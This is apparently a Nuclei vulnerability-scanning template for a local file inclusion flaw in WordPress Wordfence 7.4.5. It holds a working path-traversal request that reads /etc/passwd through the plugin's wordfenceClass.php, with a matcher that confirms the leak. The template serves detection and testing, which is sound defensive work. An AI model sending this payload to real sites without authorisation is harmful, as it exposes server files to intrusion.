id: wordpress-wordfence-lfi

info:
  name: WordPress Wordfence 7.4.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Wordfence 7.4.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48061
    - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wordfence,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/29
